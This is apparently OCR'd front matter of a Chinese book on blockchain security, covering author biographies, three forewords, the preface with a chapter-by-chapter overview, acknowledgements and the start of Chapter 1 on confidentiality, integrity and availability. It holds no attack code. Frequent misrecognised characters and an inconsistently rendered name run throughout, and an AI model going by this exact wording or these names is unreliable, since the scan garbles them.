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黄连 金 ”硅谷 Dynamic Fintech Group 管理 合伙 人 、 联 合 国旗 下 世界 区 块 链 组 织 (WBO) 首席 技术 官 、 美 国 ACM Practitioner Board 委 员 、 美 国 分 布 式 商业 应 用 公司 CEO 和 创始 人 、 中 国电 子 学 会 
区 块 链 专家 委员 、 中 国人 大 特聘 研究 员 与 讲师 、 美 国 CISSP 专 家 、CyberVein 总 顾问 ， 多 个 成 功 区 块 链 项 目 技术 顾问 。 曾 就 职 于 美国 CGI 公司 18 年 ， 任 CGI 安全 技术 总 监 、CGI 云 安全 主管 和 首席 安全 架构 
师 等 职务 ， 创 建 了 CGI 联邦 身份 管理 和 网 络 安全 能 力 中 心 。 在 CGI 工作 时 ， 曾 经 为 美国 联邦 政府 、 金 融 机 构 和 公用 事业 公司 提供 金融 、 人 工 智能 、 区 块 链 、 安 全 等 方面 的 专家 咨询 。 曾 多 次 在 国内 外 大 型 区 
块 链 峰 会 担任 嘉宾 、 评 委 、 培 训 专家 。 


吴 思 进 ”33 复 杂 美 创始 人 及 CEO， 浙 大 本 科 硕 士 毕业 ， 金 融 数据 专家 ， 精 通 量化 交易 及 区 块 链 ， 主 导 多 家 世界 500 强 区 块 链 项 目 落地 。2014 年 申请 区 块 链 发 明 专 利 ，2 项 已 授权 ， 目 前 累计 申请 专利 
50 多 项 ， 全 球 区 块 链 专利 排名 前 十 ， 主 要 区 块 链 项 目 有 供应 链 金融 、 供 应 链 管理 、 积 分 、 钱 包 、 交 易 所 。 


曹 锋 PCHAIN 发 起 人 ， 中 物 联 区 块 链 协会 首席 科学 家 。 中 国 早 期 区 块 链 国际 专利 发 明 人 ，ChinaLedger 共 同 发 起 人 ，2016 年 完成 全 球 区 块 链 资 产 收益 权 转 让 暨 中 国 区 块 链 金融 真实 交易 。 曾 担任 
IBM 全 球 下 一 代 人 机 大 战 中 国 区 负责 人 、 互 联网 金融 首席 科学 家 、 专 利 评审 委员 会 联合 主席 ;3 次 获得 IBM 全 球 杰 出 技术 成 就 奖 ， 发表 22 篇 国际 顶级 论文 ，30 余 项 美国 专利 ， 并 担任 多 个 ACM IEEE 顶 级 国 
际会 议论 坛 主席 。 


季 宙 栋 ”Onchain 分 布 科技 首席 战略 官 ， 本 体 联 合 创始 人 ， (工信部 ) 中 国 区 块 链 技术 与 产业 发 展 论坛 副 秘 书 长 ， 中 国电 子 学 会 区 块 链 专 委 会 委员 ，1SO/IEC TC307 中 国 代表 团 成 员 ， 参 与 本 体 论 、 
身份 和 隐私 保护 等 标准 组 。 作 为 区 块 链 行业 的 资深 专家 ， 参 与 了 工信部 区 块 链 白皮书 及 相关 标准 编制 工作 。 


马 臣 云 ”北京 信任 度 科技 CEO、 信 息 安全 专家 、 产 品 管理 专家 ， 电 子 认证 与 签名 行业 15 年 从 业经 验 。 主 要 方向 是 密码 学 、 区 块 链 、 身 份 认 证 、 电 子 签名 。 曾 获得 省 部 级 科技 进步 二 等 奖 (国家 密码 
局 ) 、 首 都 五 一 芳 动 奖章 、 全 国 五 一 劳动 奖章 等 ， 是 电子 签 章 技 术 、 基 于 人 脸 识别 的 身份 认证 安全 技术 、 互 联网 金融 个 人 借贷 电子 合同 安全 技术 等 标准 的 起 草 人 。 著 有 《精通 PKI 网 络 安全 认证 技术 与 编程 
实现 》。 网 络 ID: 非 著 名 信息 安全 砖 家 。 


达 摩 。 BOX.LA 项 目 发 起 人 ， 原 唯 链 COO， 参 与 了 众多 知名 区 块 链 项 目的 早期 投资 。 


李 恩 典 ”美国 分 布 式 商 业 应 用 公司 董事 与 中 国 区 总 裁 、 深 圳 市 微风 智联 科技 有 限 公司 董事 长 、 区 块 链 软件 和 金融 行业 应 用 研发 专家 。15 年 以 上 金融 安全 研发 经 验 ， 在 区 块 链 存储 、 大 数据 平台 、 物 联 
网 平台 和 金融 系统 核心 等 领域 均 有 领先 的 技术 成 果 和 丰富 的 产品 技术 实战 经 验 ， 并 拥有 近 10 项 相关 领域 友 明 专利 。 


徐 浩 铭 。 CyberVein 数 脉 链 项 目 技术 负责 人 ， 负 责 区 块 链 平台 架构 和 搭建 。 曾 就 职 于 欧洲 微软 研发 中 心 ， 负 责 Office 项 目 开发 。 毕 业 于 英国 剑桥 大 学 ， 主 要 研究 方向 为 机 器 学 习 在 生物 信息 学 领域 的 应 
用 ; 曾 在 美国 卡 内 基 - 梅 隆 大 学 访 学 ， 主 要 研究 方向 为 机 器 视 党 在 无 人 驾驶 中 的 应 用 ; 曾 在 美国 杜 克 大 学 访 学 ， 研 究 领域 为 深度 学 习 在 生物 医学 工程 中 的 应 用 。 在 SCI 和 EI 检索 杂志 上 发 表 多 篇 文章 。 


全 俊杰 1BM 10 余 年 开发 及 解决 方案 经 验 ， 第 一 批 Fabric 应 用 开发 者 ，NEO 核 心 开 发 者 之 一 ，Onchain DNA 联 盟 链 的 架构 设计 与 核心 开发 人 员 ，Ontology (本 体 ) 区 块 链 开发 团队 负责 人 。 在 票 
据 、 供 应 链 、 积 分 、 征 信 、 数 据 交易 、 共 享 金融 等 多 个 领域 有 区 块 链 应 用 经 验 。 


序 一 ”多 边界 的 区 块 链 安全 防守 


2018 年 是 区 块 链 技术 (或 称 分 布 式 账本 技术 ) 诞生 的 第 十 个 年 头 ， 人 们 对 它 所 寄予 的 厚望 正 与 日 俱 增 。 很 多 人 认为 区 块 链 技术 不 仅 会 对 现 有 的 产品 、 服 务 、 操 作 系统 、 商 业 模式 、 最 佳 实践 ， 乃 至 各 
行 各 业 带 来 巨大 冲击 ， 甚 至 可 能 带 来 经 济 运行 以 及 社会 组 织 和 治理 的 大 变革 。 这 是 因为 区 块 链 技术 促进 了 加 密 技术 等 方面 的 科技 进步 ， 实 现 了 低 成 本 和 实时 条 件 下 的 超 强 处 理 能 力 ， 同 时 为 金融 服务 、 医 
疗 保健 、 物 流 ， 以 及 环境 保护 等 产业 的 可 持续 发 展 提 供 了 无 限 可 能 。 但 更 重要 的 是 ， 区 块 链 技术 建立 在 去 中 心 化 共识 、 开 源 、 透 明和 社区 参与 这 些 原则 之 上 。 这 些 基本 原则 才 是 这 一 技术 具有 革新 性 潜能 
的 根本 所 在 。[] 


包括 联合 国 和 世界 银行 集团 ( 世 行 ) 在 内 的 多 边 组 织 已 经 意识 到 区 块 链 技术 将 会 对 各 发 展 机 构 及 其 工作 产生 深远 的 影响 。 这 是 因为 区 块 链 技术 能 够 帮助 友 展 机 构 减 轻 对 传统 银行 及 其 他 中 介 机 构 的 依 
赖 ， 从 而 大 大 降低 交易 成 本 ; 确保 援助 资金 直接 转 给 援助 对 象 ， 保 证 专款 专用 ， 使 整个 环节 更 加 透明 。 鉴 于 此 ， 世 行 于 2017 年 6 月 建立 了 区 块 链 实验 室 ， 专 注 研 究 区 块 链 领域 的 创新 技术 ， 以 求 更 好 地 服 
务 世 行 的 发 展 项 目 。 


虽然 区 块 链 技术 拥有 巨大 的 潜力 ， 但 它 目前 仍 面 临 很 多 挑战 。 对 于 这 样 一 个 自动 化 、 去 中 心 化 和 不 断 扩展 的 系统 来 说 ， 安 全 性 是 不 容 回避 的 问题 。 区 块 链 技术 在 安全 性 方面 面临 的 挑战 包括 三 方面 。 
首先 ， 虽 然 区 块 链 技术 能 够 为 交易 提供 高 度 的 完整 性 (integrity) 和 透明 度 (transparency) ， 但 是 系统 设计 方面 仍 骂 待 加 强 ， 才 能 保证 区 块 链 基 础 设施 和 平台 的 机 密 性 (confidentiality) 和 弹性 
(resiliency) 。 其 次 ， 不 论 是 共识 机 制 还 是 “智能 合约 ”， 区 块 链 技术 都 需要 依靠 开发 各 种 应 用 软件 来 实现 。 因 此 ， 软 件 开发 安全 方面 的 最 佳 实践 仍 应 继续 遵守 。 最 后 ， 区 块 链 技术 需要 相应 的 生态 系统 
来 为 实践 提供 完整 解决 方案 。 这 个 生态 系统 可 能 会 运用 包括 物 联 网 (loT) 、 人 工 智能 和 云 计 算 在 内 的 其 他 新 技术 。 这 意味 着 ， 所 有 这 些 构成 区 块 链 生态 系统 的 技术 本 身 的 安全 问题 也 需 一 并 考量 。 


我 在 世 行 区 块 链 实验 室 举办 的 一 次 活动 中 结识 了 黄连 金 先生 。 黄 先生 是 那 次 活动 的 特约 嘉宾 ， 也 是 本 书 的 第 一 作者 。 当 时 黄 先 生 在 华为 技术 有 限 公 司 担任 首席 区 块 链 专家 ， 他 也 是 中 国 区 块 链 安全 领 
域 的 领军 人 物 。 从 他 那里 我 了 解 到 ， 虽 然 区 块 链 技术 还 在 发 展 阶段 ， 但 在 中 国 已 经 有 一 批 安全 专家 开始 合作 编写 一 本 关于 区 块 链 安全 问题 的 著作 。 这 让 我 惊喜 不 已 ， 因 为 一 直 以 来 ， 人 们 总 在 创新 技术 产 
生 之 后 才 亡 手 补 牢 ， 考 虑 安全 问题 。 我 相信 ， 这 本 强调 安全 先行 的 著作 ， 对 确保 未 来 区 块 链 解决 方案 的 可 靠 性 和 实用 性 大 有 神 益 。 


本 书 对 区 块 链 技术 潜在 风险 的 分 析 可 谓 详尽 、 完 备 : 不 仪 包括 区 块 链 技术 本 身 带 来 的 风险 〈 比 如 加 密 技术 、 身 份 管理 技术 、 共 识 技术 ， 以 及 “智能 合约 ”技术 可 能 涉及 的 风险 ) ， 还 包括 区 块 链 应 用 
方面 的 风险 (例如 激励 机 制 、 数 据 安全 和 网 络 安全 等 方面 可 能 面临 的 风险 ) 。 书 中 不 但 有 对 区 块 链 技术 各 种 安全 机 制 的 深度 解剖 ， 而 且 有 区 块 链 应 用 遭受 攻击 的 案例 分 析 。 这 样 理 论 与 实际 结合 ， 有 助 于 
读者 学 以 致 用 ， 将 对 潜在 风险 的 预期 和 评估 置 于 现实 背景 之 下 。 


为 本 书 作 序 ， 我 备 感 欣 怀 。 据 我 所 知 ， 本 书 是 全 球 为 数 不 多 关注 区 块 链 安全 问题 的 专著 。 借 着 这 则 序言 ， 我 期 待 能 够 让 更 多 的 人 在 区 块 链 及 其 他 革命 性 技术 创新 的 初期 就 开始 考虑 安全 问题 的 重要 
性 。 愿 更 多 的 研发 人 员 、 商 业 人 士 以 及 政策 制定 者 都 天 注 安 全 问题 。 我 们 会 因此 而 更 有 信心 应 对 未 来 技术 应 用 (Technology Adoption) 过 程 中 的 各 种 挑战 。 


林 俑 明 


世界 银行 集团 首席 信息 安全 官 、 
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[1] 英国 政府 首席 科学 顾问 报告 : 《分 布 式 账本 技术 : 超越 “区 块 ” 和 “ 链 ”》 (Distributed Ledget Technology: Beyond Block Chain) 。 


序 二 ”区 块 链 安全 观 之 我 见 


区 块 链 安全 观 可 以 从 两 方面 来 讨论 。 技 术 方 面 的 安全 观 是 本 书 的 主题 ， 退 逮 高 论 ， 各 位 看 官 自 可 体会 ; 我 想 从 区 块 链 经 济 模式 的 安全 观 方面 ， 谈 一 些 自己 的 学 习 体会 ， 以 就 教 于 各 位 作者 和 读者 。 
从 经 济 模式 来 看 区 块 链 ， 我 把 它 分 为 4 个 层次 。 

. 最 底层 是 区 块 链 数字 身份 体系 。 数 字 身 份 包 括 了 身份 ID、 社 交 关 系 、 职 业 声 誉 、 生 活 状 态 等 ， 远 比 一 串 身 份 证 号 码 要 更 全 面 、 更 传神 。 

` 第 二 层 是 密码 学 账户 体系 。 基 于 非 对 称 加 密 算法 的 分 布 式 账本 ， 非 许可 、 无 须 KYC， 支 持 点 对 点 交易 ， 靠 算法 保证 交易 安全 可 靠 ， 坏 人 无 法 作恶 。 

. 第 三 层 是 区 块 链 数字 货币 体系 。 公 有 区 块 链 靠 算法 发 行 数 字 货 币 的 一 个 最 主要 的 目的 是 为 自 组 织 建 立 一 种 去 中 心 化 的 经 济 激励 机 制 。 

` 第 四 层 是 商业 应 用 体系 。 有 了 前 3 层 ， 任 何 分 布 式 商业 应 用 项 目 就 有 了 生存 的 基础 和 无 限 的 发 展 空间 。 


区 块 链 技术 层面 的 安全 ， 都 是 为 其 经 济 模式 的 安全 运行 服务 的 。 无 论 是 保证 数据 一 致 性 的 哈 希 浮 数 ， 还 是 保护 隐私 的 零 知识 证 明 ; 不 管 是 维护 账户 安全 的 椭圆 曲线 加 密 算法 ， 还 是 保护 数据 主权 的 多 
方 安全 计算 ; 直至 协调 区 块 链 治理 的 各 种 共识 算法 .…… 在 分 布 式 、 去 中 心 、 自 组 织 的 区 块 链 世 界 里 ， 信 任 关 系 和 安全 机 制 的 建立 ， 完 全 依赖 一 整套 成 体系 的 数学 和 密码 学 算法 来 保证 安全 、 可 靠 。 


传统 金融 业界 有 一 句 名 言 : 无 硬件 ， 不 安全 。 其 实 这 句 话 也 完全 适用 于 区 块 链 经 济 模式 。 硬 件 安全 不 仅仅 涉及 数字 货币 “热钱 包 ”“ 冷 钱包 ”层面 的 事情 ， 它 还 可 能 涉及 区 块 链 上 金融 交易 的 报 文 传 
输 等 方面 。 


本 书 是 一 本 从 技术 角度 讨论 区 块 链 安全 的 著作 。 在 区 块 链 “高烧 ”发 热 ， 热 到 有 可 能 大 热 倒 灶 的 今天 ， 一 群 业界 同仁 愿意 埋头 沉 心 ， 专 注 区 块 链 的 安全 问题， 实在 是 难能可贵 ! 


作为 一 名 非 技 术 背 景 的 区 块 链 信徒 ， 阅 读 这 样 一 本 洋溢 着 精深 技术 见解 的 区 块 链 安全 著作 ， 仍 然 从 中 学 到 很 多 ， 司 到 更 多 。 诚 所 谓 见仁见智 ， 乐 山 乐 水 是 也 ! 故 不 论 “ 币 圈 ”“ 链 圈 ”， 无 论 专业 背 
景 ， 特 推荐 之 ， 必 有 收获 珊 ! 


肖 风 


中 国 万 向 控股 有 限 公 司 副 董事 长 、 万 向 区 块 链 实验 室 董事 长 兼 总 经 理 


序 三 ”安全 是 区 块 链 友 展 和 应 用 的 基石 


2008 年 ， 中 本 聪 的 论文 “比特 币 : 一 种 点 对 点 的 电子 现金 系统 ”一 经 发 表 ， 犹 如 “ 忽 如 一 夜 春风 来 ， 干 树 万 树 梨花 开 ”。 历 经 十 年 的 迅猛 发 展 ， 区 块 链 已 成 为 近年 来 最 具 革 命 性 的 新 兴 技 术 之 一 ， 并 
广泛 应 用 于 各 种 社会 场景 之 中 。 任 何事 物 取 得 如 此 之 重要 地 位 ， 必 定 有 其 独特 魅力 。 


区 块 链 的 魅力 在 于 ， 它 可 以 利用 自律 解决 社会 中 靠 他 律 才能 解决 的 问题 ; 区 块 链 的 魅力 在 于 ， 它 使 参与 者 都 有 知情 权 ， 信 息 对 等 ， 脱 离 了 只 有 少数 人 掌握 信息 的 不 平等 状态 ; 区 块 链 的 魅力 在 于 ， 它 
能 够 做 到 在 现实 社会 中 我 们 始终 倡导 和 追求 的 诚信 ， 而 不 需要 人 们 的 长 期 认 知 才能 达到 (其 模式 自身 就 存在 诚信 ， 不 可 抵赖 ) ; 区 块 链 的 魅力 在 于 ， 它 需要 大 多 数 伙伴 的 认同 ， 使 人 们 能 够 为 了 一 个 共同 
的 目标 而 努力 ;区 块 链 的 魅力 在 于 ， 它 使 事物 脱离 了 一 成 不 变 的 程式 化 发 展 趋势 ， 而 迎 来 “百般 红 紫 斗 芳 菲 ” 的 各 式 发 展 。 其 实 ， 区 块 链 的 这 些 魅 力 并 不 是 其 刻意 而 为 乙 ， 而 是 其 自身 特性 决定 的 。 因 为 
独特 ， 所 以 灿烂 。 


区 块 链 的 这 些 特殊 魅力 吸引 了 社会 各 界 的 广泛 天 注 ， 但 是 能 否 长 久保 鲜 而 不 受 摧残 也 成 为 我 们 担心 的 天 键 点 。 区 块 链 的 自律 ， 使 职能 机 构 失去 控制 权 ; 区 块 链 的 信息 共享 ， 使 隐私 更 易 暴露 ; 区 块 链 
的 不 可 算 改 ,使 可 能 的 错误 变 成 “真实 ”而 存在 ;区 块 链 的 共识 ,使 大 多 数 伙伴 的 观点 无 论 正确 与 否 都 变 得 “正确 ”; 区 块 链 各 具 特 色 的 发 展 模式 ， 使 漏洞 出 现 的 可 能 性 提高 ， 容 易 导 致 应 用 的 浩 动 。 因 
此 ， 区 块 链 要 真正 快速 友 展 和 广泛 应 用 ， 就 要 不 断 提高 其 自身 安全 性 。 

黄连 金 先 生 作为 区 块 链 资 深 高 端 专家 ， 经 过 长 年 研究 积 汪 ， 在 区 块 链 安全 研究 成 果 较 少 的 情况 下 ， 他 能 够 领先 其 他 学 者 研究 产 出 第 一 批 专门 的 区 块 链 安全 著作 ， 可 谓 独 具 慧 眼 。 仪 从 这 一 点 ， 足 以 看 
出 他 是 具有 长 远 眼光 和 思想 前 瞻 性 的 专家 。 有 笠 提 前 拜读 他 的 区 块 链 安全 研究 成 果 ， 使 我 全 面 地 认识 到 区 块 链 安全 的 重要 性 ， 对 区 块 链 安全 有 了 合理 的 分 类 认 知 ， 也 从 中 了 解 到 未 来 区 块 链 安全 研究 的 热 
点 ， 学 到 一 些 有 关 区 块 链 安全 的 有 效 研 究 手 段 。 阅 读 时 ， 我 能 感受 到 本 书 行文 流畅 ， 在 学 习 到 较 新 的 有 价值 的 研究 成 果 的 同时 ， 体 会 到 阅读 的 快乐 ， 创 新 的 热情 。 为 本 书写 序 ， 备 感 荣幸 。 希 望 更 多 的 人 
了 解 区 块 链 ， 在 未 来 的 区 块 链 模式 中 夯实 区 块 链 安全 的 基石 ， 从 而 使 区 块 链 及 其 应 用 更 加 坚不可摧 ， 更 具 鬼 力 。 


祝 烈 煌 


北京 理工 大 学 计算 机 学 院 副 院 长 、 教 授 


为 什么 要 写 这 本 书 


这 本 书 的 初衷 是 希望 给 区 块 链 项 目 提 供 一 些 安全 方面 的 指导 来 改变 目前 区 块 链 项 目 和 匆匆 上 线 ， 安 全 系数 不 高 ， 安 全 问题 层出不穷 的 现状 ， 也 希望 正在 开发 或 将 来 需要 开发 的 区 块 链 项 目 在 安全 方面 给 
予 足 够 的 重视 。 我 们 认为 安全 问题 会 是 区 块 链 项 目 落地 的 主要 绊脚石 。 一 个 不 注意 安全 的 区 块 链 项 目 ， 成 功 系数 不 会 很 高 。 区 块 链 有 很 好 的 安全 属性 ， 比 如 数据 不 可 算 改 、 数 据 不 会 丢失 、 可 利用 一 些 加 
密 技 术 对 数据 进行 加 密 等 。 但 是 从 许多 与 区 块 链 有 关 的 安全 事件 可 以 看 出 ， 区 块 链 的 安全 属性 不 能 保证 区 块 链 项 目 百分之百 安全 。 本 书 尽 量 从 多 个 不 同 的 方面 ， 比 较 系统 地 对 区 块 链 的 安全 进行 分 析 ， 并 
且 对 区 块 链 项 目 落 地 所 需要 考虑 的 因素 ， 提 供 一 些 建议 。 


本 书 特色 


本 书 是 为 数 不 多 系统 性 地 前 述 区 块 链 安全 的 书 。 


本 书 的 主要 特色 是 以 深入 浅 出 的 形式 讲解 区 块 链 的 安全 ， 便 于 读者 更 好 地 理解 为 什么 区 块 链 安全 是 一 个 重要 的 课题 ， 以 及 如 何 解 决 某 些 区 块 链 的 安全 问题 。 


读者 对 象 
本 书 的 读者 对 象 包括 : 
“ 区 块 链 的 开发 者 
. 区 块 链 安全 的 架构 师 


区 块 链 项 目的 主要 技术 负责 人 


其 他 对 区 块 链 安全 感 兴趣 的 人 


如 何 阅读 本 书 


在 阅读 过 程 中 ， 读 者 可 以 根据 工作 需要 将 某 些 章节 多 读 几 遍 。 因 为 章节 与 章节 之 间 的 依赖 性 不 强 ， 完 全 可 以 根据 工作 需要 抽出 重点 来 读 。 


第 1 章 详解 区 块 链 的 安全 属性 ， 主 要 从 保密 性 、 数 据 完整 性 、 可 用 性 、 物 理 安 全 性 4 个 方面 对 区 块 链 的 安全 属性 进行 详解 。 在 分 析 过 程 中 ， 本 章 穿插 了 一 些 实例 ， 使 得 内 容 讲解 更 为 直观 、 易 懂 。 本 章 
所 介绍 的 内 容 ， 可 以 使 读者 对 区 块 链 的 安全 属性 有 更 深层 次 的 了 解 ， 对 做 好 区 块 链 的 安全 工作 具有 非常 重要 的 参考 价值 。 


由 于 区 块 链 的 安全 性 分 析 极 具 抽 象 性 ， 所 以 第 2 章 特意 挑选 了 一 些 主流 数字 货币 (包括 比特 币 、 以 太 币 和 Zcash) ， 对 其 安全 属性 进行 分 析 。 通 过 本 章 的 学 习 ， 读 者 可 以 了 解 主流 数字 货币 的 代码 、 密 
码 学 算法 以 及 “钱包 ”等 ， 进 一 步 加 深 对 区 块 链 相关 安全 技术 的 认识 。 


第 3 章 为 应 用 与 智能 合约 层 的 安全 控制 。 本 章 主要 从 Web 或 者 移动 客户 端 应 用 程序 、 智 能 合约 ， 以 及 身份 与 访问 控制 3 个 方面 对 安全 问题 进行 分 析 。 在 当前 信息 技术 快速 友 展 的 背景 下 ， 移 动 设备 已 经 
成 为 很 多 人 上 网 的 主要 工具 。 为 此 ， 本 章 从 一 开始 就 对 Web 或 者 移动 客户 端 应 用 程序 的 安全 性 进行 了 分 析 ， 让 读者 对 相关 的 危险 因素 有 所 了 解 。 在 智能 合约 的 安全 方面 ， 主 要 从 智能 合约 的 概念 、 安 全 编 
码 、 漏 洞 、 开 源 工具 等 几 个 方面 进行 了 分 析 ， 为 读者 在 开发 相关 内 容 方 面 提供 了 重要 的 参考 。 在 本 章 的 最 后 ， 从 多 个 方面 对 区 块 链 的 身份 管理 与 访问 控制 进行 了 分 析 。 通 过 对 这 部 分 内 容 的 学 习 ， 读 者 可 
以 了 解 在 开发 区 块 链 的 过 程 中 ， 如 何 高 效 、 安 全 地 做 好 身份 管理 与 访问 控制 等 工作 。 


第 4 章 为 激励 层 安 全 机 制 设 计 。 本 章 主要 从 激励 的 产生 和 分 配 以 及 激励 层 安全 两 方面 进行 了 分 析 。 首 先 ， 分 别 借助 比特 币 、 以 太 币 的 激励 模式 对 激励 的 产生 和 分 配 进 行 了 分 析 ， 可 以 让 读者 对 区 块 链 激 
励 层 的 存在 有 较为 直观 的 认识 。 在 此 基础 上 ， 本 章 又 从 激励 模式 的 安全 隐患 、 安 全 事件 、 法 律 风险 以 及 安全 措施 等 方面 ， 对 激励 层 安 全 进行 了 分 析 ， 让 读者 了 解 安全 对 激励 层 的 重要 性 ， 以 及 如 何 设计 才 
能 有 效 避 免 区 块 链 激 励 层 安全 事件 的 发生 。 


第 5 章 为 网 络 层 安全 与 控制 。 网 络 层 是 区 块 链 的 重要 组 成 部 分 ， 能 否 做 好 安全 与 控制 直接 影响 区 块 链 的 价值 。 本 章 主要 从 P2P 加 密 、 客 户 端 与 节点 通信 加 密 、 防 御 DDoS 攻 击 3 个 方面 进行 了 分 析 。 通 过 
对 本 章 的 学 习 ， 读 者 可 以 对 网 络 层 安全 与 控制 的 相关 内 容 有 全 面 的 了 解 。 这 对 开发 过 程 中 提高 区 块 链 的 安全 性 具有 重要 指导 作用 。 


第 6 章 为 数据 层 与 共识 安全 。 数 据 层 是 区 块 链 设 计 的 基础 部 分 ， 是 影响 区 块 链 能 否 正常 运行 的 关键 。 本 章 主要 从 区 块 链 数据 加 密 技术 、 数 据 传输 、 区 块 链 交易 签名 、 共 识 攻 击 、 区 块 链 安全 性 考虑 5 个 
方面 进行 分 析 。 通 过 本 章 的 学 习 ， 读 者 可 以 了 解 天 于 数据 层 安全 更 多 的 知识 。 这 对 于 提高 区 块 链 的 安全 ， 保 障 区 块 链 的 正常 运行 具有 重要 的 参考 价值 。 


第 7 章 为 私 钥 的 安全 。 本 章 从 私 钥 的 重要 性 、 使 用 方法 、 存 在 的 问题 等 多 个 方面 对 私 钥 的 安全 进行 了 全 面 的 分 析 。 通 过 对 本 章 的 学 习 ， 读 者 可 以 对 私 钥 安 全 性 在 区 块 链 技 术 中 的 重要 性 有 更 深层 次 的 认 
识 ， 了 解 如 何 使 用 私 钥 才能 有 效 避 免 安 全 问题 的 出 现 以 及 私 钥 的 更 新 、 找 回 与 吊销 等 。 除 此 之 外 ， 本 章 还 对 私 钥 保 护 的 正确 “姿势 ”、 硬 件 钱 包 等 内 容 做 了 分 析 。 有 了 这 些 内 容 的 指导 ， 读 者 可 以 参考 、 
拓展 关于 保障 硬件 钱包 、 移 动 钱包 方面 的 设计 思路 ， 提 高 区 块 链 的 安全 性 。 


除了 上 述 内容 ， 本 书 还 包括 3 个 附录 。 附 录 A 介 绍 的 是 区 块 链 安全 基础 概念 、 原 理 与 分 析 方法 ， 可 以 更 好 地 理解 区 块 链 。 当 制定 区 块 链 安全 性 测试 标准 时 ， 可 以 适当 地 参考 、 借 鉴 。 附 录 B 主 要 介绍 
DAG 的 基本 概念 、 原 理 与 主流 项 目 ， 从 中 可 以 了 解 DAG 给 区 块 链 安全 融 来 的 价值 和 影响 。 附 录 C 介 绍 区 块 链 私 钥 管理 的 一 种 方法 ， 主 要 用 于 企业 级 数字 资产 的 安全 。 


勘误 和 支持 


本 书 从 不 同 的 角度 来 前 述 区 块 链 安全 ， 抛 砖 引 玉 。 我 们 不 能 说 这 本 书包 含 了 区 块 链 项 目 落 地 需要 考虑 的 所 有 安全 因素 ， 因 为 不 可 能 面面俱到 。 区 块 链 目前 尚 处 于 初级 的 技术 发 展 阶段 ， 新 的 安全 隐患 
和 新 的 安全 措施 会 在 发 展 的 过 程 之 中 不 断 涌现 。 我 们 希望 这 本 书 是 “活着 ”的 书 ， 通 过 不 断 地 修订 ， 尽 量 把 新 的 内 容 添加 到 这 本 书 ， 也 欢迎 区 块 链 安全 专家 在 这 方面 给 我 们 多 提 一 些 意见 。 


本 书 不 是 从 空中 楼 阁 造 出 来 的 ， 我 们 参阅 了 大 量 网 络 公开 的 内 容 ， 并 且 引 用 了 很 多 区 块 链 安全 专家 在 不 同 新 闻 媒 体 或 者 网 络 所 刊登 的 内 容 以 及 个 别 面对面 的 交流 信息 。 对 于 被 引用 的 内 容 或 者 面对面 
交流 的 信息 ， 我 们 尽量 与 各 位 专家 进行 了 沟通 ， 并 且 获 得 了 同意 ， 比 如 NEO 创 始 人 、OnChain 创 始 人 及 CEO 达 鸿 丰 ，NEO 创 始 人 兼 核心 开发 者 张 铮 文 ， 上 交 所 技术 有 限 责 任 公司 架构 师 朱 立 ， 复 杂 美 CTO 
王志文 ， 元 界 CEO 顾 疾 (初夏 虎 ) ， 元 界 CTO 陈 浩 ， 公 信 宝 CEO 黄 敏 强 ，Dfinity CEOJ 舌 (Tom Ding) 等 。 不 过 ， 仍 有 可 能 某 些 内 容 与 网 上 公开 的 内 容 人 存在 类 似 或 雷同 之 处 ， 在 所 难免 ， 敬 请 谅解 。 如 
果 在 阅读 本 书 的 过 程 中 发 现 有 类 似 的 内 容 ， 请 及 时 与 我 们 联系 ， 我 们 会 在 修订 版 中 增加 引用 的 出 处 。 


致谢 


在 这 里 ， 首 先 要 感谢 高 婧 雅 编辑 ， 她 从 一 开始 便 对 本 书 高 度 重视 ， 人 在 写作 过 程 中 不 断 鼓励 我 们 。 在 北京 的 一 次 会 义 上 ， 高 编辑 和 我 基本 上 拟订 了 这 本 书 的 以 构 和 一 些 基 本 内 容 ， 并 且 以 后 又 经 过 几 次 
优化 ， 才 有 现在 这 本 书 的 框架 。 


非常 感谢 本 书 所 有 的 作者 ， 他 们 在 百 忙 之 中 抽出 时 间 写 了 这 本 书 ， 并 且 经 过 多 次 修改 。 应 该 说 没有 这 些 作 者 的 贡献 ， 就 不 会 有 这 本 书 。 

感谢 深圳 市 微风 智联 科技 有 限 公司 的 李 恩 典 和 梁 福 彬 ， 他 们 非常 有 启发 意义 的 讨论 和 对 我 负责 写作 的 内 容 的 多 次 修改 ， 是 我 完成 写作 的 最 大 助力 。 

非 党 感谢 世界 银行 集团 首席 信息 安全 官 、 区 块 链 实验 室 负责 人 林 儒 明 先生 ， 他 不 仅 为 本 书 做 序 ， 还 在 写作 过 程 中 不 断 鼓励 我 们 ， 多 次 提供 良好 的 建议 。 

中 国 万 向 控股 有 限 公司 副 董事 长 、 万 向 区 块 链 实验 室 董 事 长 兼 总 经 理 肖 风 博 士 对 本 书 的 构思 和 一 开始 的 概念 提出 了 很 多 宝贵 意见 ， 给 予 我 们 很 大 的 帮助 ， 同 时 还 为 本 书 作 序 ， 在 此 也 表示 感谢 。 
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第 1 草 ”详解 区 块 链 的 安全 属性 


区 块 链 的 本 质 是 一 个 去 中 心 化 的 数据 库 。 在 运行 过 程 中 ， 区 块 链 将 数据 信息 采用 分 布 式 方 式 记录 ， 并 且 由 所 有 的 参与 者 共同 记录 。 这 些 数据 信息 会 被 存储 在 所 有 的 节点 之 中 ， 而 不 是 像 传 统 数 据 库 一 
样 ， 仅 仅 存 在 于 唯一 的 中 心 化 机 构 。 因 此 ， 在 安全 性 方面 ， 较 传统 技术 实现 了 质 的 突破 。 安 全 性 已 经 成 为 信息 化 社会 的 主旋律 ， 如 果 安 全 问题 无 法 得 到 有 效 的 解决 ， 那 么 区 块 链 就 无 法 实现 推广 。 因 此 ， 
安全 性 已 经 成 为 制约 区 块 链 发 展 的 重要 因素 。 本 章 将 通过 安全 的 4 个 要 素 ( 见 图 1-1) 介绍 和 分 析 区 块 链 的 安全 属性 。 


第 一 个 要 素 是 保密 性 (Conf identiality) : 数据 和 交易 的 内 容 在 传输 与 存储 的 过 程 中 被 加 密 ， 从 而 保护 了 用 户 隐私 和 企业 、 机 构 的 商业 机 密 、 知 识 产权 及 其 他 机 密 信息 。 
第 二 个 要 素 是 完整 性 (Integrity) : 确保 信息 在 存储、 使 用 、 传 输 过 程 中 不 会 被 非 授权 用 户 纂 改 ， 同 时 还 要 防止 授权 用 户 对 系统 及 信息 进行 不 恰当 的 纂 改 ， 保 持 信息 内 部 、 外 部 表示 的 一 致 性 。 
第 三 个 要 素 是 可 用 性 (Availability) : 确保 授权 用 户 或 实体 对 信息 及 资源 的 正常 使 用 不 会 被 异常 拒绝 ， 人 允许 其 可 靠 而 及 时 地 访问 信息 及 资源 。 


